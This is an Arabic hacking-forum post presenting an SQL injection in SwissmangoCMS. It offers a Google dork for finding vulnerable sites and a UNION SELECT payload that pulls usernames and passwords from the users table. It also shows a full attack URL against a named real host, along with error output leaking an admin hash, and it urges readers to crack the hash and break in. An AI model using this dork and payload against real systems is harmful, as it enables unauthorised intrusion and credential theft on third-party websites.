MATRIX ALGERIA
New Member
ثغرة في سكربت SwissmangoCMS
السلام عليكم اخوتي العناكب اليوم انشاء جئت لكم بثغرة جديدة
نبدا بسم الله
ندخل موقع قوقل
www.google.com
نقوم بالبحث عن
الاستغلال
مثال
وطلع لنا الاتي
يعني ان المعلومات هكذا
admin:1a1dc91c907325c69271ddf0c944bc72
ماعليك الا فك الهاش واختراقات موفقة
الموضوع اصلي : الشبكة العنكبوتية الاحترافية نرجو حفظ الحقوق
نبدا بسم الله
ندخل موقع قوقل
www.google.com
نقوم بالبحث عن
PHP:
inurl:/index.php?main=الاستغلال
PHP:
666+and+1=2+union+select+concat_ws(0x3a,userName,userPass)+from+users--مثال
PHP:
http://dev.swissmango.com/index.php?main=666+and+1=2+union+select+concat_ws
(0x3a,userName,userPass)+from+users--وطلع لنا الاتي
PHP:
SELECT navParent FROM navigation WHERE navID = admin:1a1dc91c907325c69271ddf0c944bc72
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ':1a1dc91c907325c69271ddf0c944bc72' at line 1يعني ان المعلومات هكذا
admin:1a1dc91c907325c69271ddf0c944bc72
ماعليك الا فك الهاش واختراقات موفقة
الموضوع اصلي : الشبكة العنكبوتية الاحترافية نرجو حفظ الحقوق
اسم الموضوع : ثغرة في سكربت SwissmangoCMS
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات